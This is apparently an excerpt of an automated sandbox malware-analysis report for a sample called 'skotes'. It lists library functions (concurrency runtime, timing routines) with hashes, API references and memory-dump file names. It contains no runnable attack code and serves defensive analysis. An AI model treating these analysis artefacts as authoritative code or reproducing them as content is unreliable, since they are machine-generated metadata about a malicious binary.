API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
String ID:
API String ID: 1091748018-0
Opcode ID: 764f06ebafaf1212ae5b78003be1223e978188fed297e14e84291c3fc122d49e
Instruction ID: a9d216dc46f067b74a39a37f3361a05baa45d1a565e08487f6dd28fe00b98f41
Opcode Fuzzy Hash: 764f06ebafaf1212ae5b78003be1223e978188fed297e14e84291c3fc122d49e
Instruction Fuzzy Hash: 9B410774620211ABCF19DF24C886BBDBB76AF46320F04449AE5079B7C2CFB4AD55CB91

Function 002A56AF Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_InternalDeleteHelper.LIBCONCRT ref: 002A56F2
_InternalDeleteHelper.LIBCONCRT ref: 002A5726
Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 002A578B
SafeRWList.LIBCONCRT ref: 002A579A

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
String ID:
API String ID: 893951542-0
Opcode ID: 5121490fef12cdf6f2c426ed2dbbe05bc38d480a0894e0a42742f4ef99a9af9b
Instruction ID: 73d1ef20a1b11402379cf44315a0de4e5986cd3078a25a5744863f85f989b4cf
Opcode Fuzzy Hash: 5121490fef12cdf6f2c426ed2dbbe05bc38d480a0894e0a42742f4ef99a9af9b
Instruction Fuzzy Hash: 31312636B015259FCF05AF20DC85BAEB3A6AFCA714F144179ED06AB355DF70AC048B90

Function 002A2CFC Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 002A2D0F

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: e5044fb24972359948e6e746af958bc6553fe70baca3d1534b101a8c81ea8ad1
Instruction ID: 93e750c29710453809c917c8be8652646fad69027d7d8f11cd5827aa6d460829
Opcode Fuzzy Hash: e5044fb24972359948e6e746af958bc6553fe70baca3d1534b101a8c81ea8ad1
Instruction Fuzzy Hash: 83313B75A10709DFCF10DF98C9C0BAE7BB9AF45310F1404AADD01AB246DB70A959DBA0

Function 002B13F5 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 002B13FC
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 002B1447
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 002B147A
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 002B152A

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: a03efd14fcdaa35449fb9c258eb2b0f79b7b03cfb54c2271a63e14f3f9eb2bd7
Instruction ID: 7ae7dbc61d0dd73e0664bf7db04329bc605e4144f0b66a85d6fc546f2c7cc41e
Opcode Fuzzy Hash: a03efd14fcdaa35449fb9c258eb2b0f79b7b03cfb54c2271a63e14f3f9eb2bd7
Instruction Fuzzy Hash: ED317071E206069BCF14EFA9C4919EDFBB5BF48710B54822DE416A7391CB34AD61CF90

Function 0029BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0029BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0029BBE4
_xtime_get.LIBCPMT ref: 0029BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0029BC13

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 8b8e0c7ce038e242f54ddd884d57e56231eeb65accd09c539e6e45a1097cba46
Instruction ID: 7bc96e9f79f538ea252945ceaef98bd0ce9d82d2076a0d685ad63c96f145f7ee
Opcode Fuzzy Hash: 8b8e0c7ce038e242f54ddd884d57e56231eeb65accd09c539e6e45a1097cba46
Instruction Fuzzy Hash: 98212F71E11119AFDF01EFA4DD859BEB7B9EF48710F10002AF901A72A1DB309D119FA0

Function 002A9C95 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 002A9C9C
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 002A9CE8
std::bad_exception::bad_exception.LIBCMT ref: 002A9CFE
std::bad_exception::bad_exception.LIBCMT ref: 002A9D6A

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: 9883dd3db2bc682ae302958f3405a0018d471de9019fd92e449bd1bea054d1fb
Instruction ID: 78a3955cc337548112f6e813c63add792d2a902ccf5a623a5e7f0393b5b88aff
Opcode Fuzzy Hash: 9883dd3db2bc682ae302958f3405a0018d471de9019fd92e449bd1bea054d1fb
Instruction Fuzzy Hash: A421B371920A14DFDB05FF65D982DAEB7B4AF06310B20406AF102AB261EF716EE1CF55

Function 002AA026 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 002AA069

Part of subcall function 002AB560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 002AB5AF

Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 002AA07F
Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 002AA0CB

Part of subcall function 002AAB41: List.LIBCONCRT ref: 002AAB77

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 002AA0DB

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
String ID:
API String ID: 932774601-0
Opcode ID: 3baf6aaa8ed8bfe5bd1802fc38dbc5960457aaf20eca4b4e1259f2f2d8c05789
Instruction ID: 1490578c666d61e028aab409c82ca071672ba6f0d88a5bd0ee749ed25406894d
Opcode Fuzzy Hash: 3baf6aaa8ed8bfe5bd1802fc38dbc5960457aaf20eca4b4e1259f2f2d8c05789
Instruction Fuzzy Hash: D221D932920B149FCB24EF64D8908AAF3F9FF59300700495EE442A7661DF34B805CBA2

Function 002A4885 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 002A4893
ListArray.LIBCONCRT ref: 002A48A5

Part of subcall function 002A5555: _InternalDeleteHelper.LIBCONCRT ref: 002A5564

ListArray.LIBCONCRT ref: 002A48AF
_InternalDeleteHelper.LIBCONCRT ref: 002A48C8

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
